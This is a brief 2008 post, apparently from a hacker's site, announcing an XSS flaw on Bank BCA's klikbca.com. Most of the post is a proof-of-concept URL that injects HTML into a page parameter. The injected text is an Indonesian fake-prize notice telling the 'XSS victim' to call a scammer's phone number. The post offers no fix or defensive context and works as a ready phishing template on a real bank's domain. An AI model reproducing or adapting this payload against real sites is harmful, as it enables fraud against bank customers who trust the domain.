Bank BCA Vulnerable to XSS


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Monday, July 21st, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


{image: klikbca.com XSSED by SPYRO KiD}

klikbca.com XSSED by SPYRO KiD

POC:

http://www.klikbca.com/GebyarBCA2006/pemenangGebyarBCAfalse3.html?mMsg=%3Ch1%3ESELAMAT%20KEPADA%20KORBAN%20XSS%3C/h1%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EAnda%20memenangkan%20hadiah%20berupa%20blablabla..%3Cbr%3Euntuk%20informasi%20lebih%20lanjut%20mengenai%20prosedur%20pengambilan%20hadiah,%20Hubungi:%201234567890%20(nomor%20penipu)%3Cbr%3E%3Ccenter%3E%3Chr%3Ewww.spyrozone.net%3Chr%3E%3Cbr%3E%3C/td%3E%3C/tr%3E


//E.O.F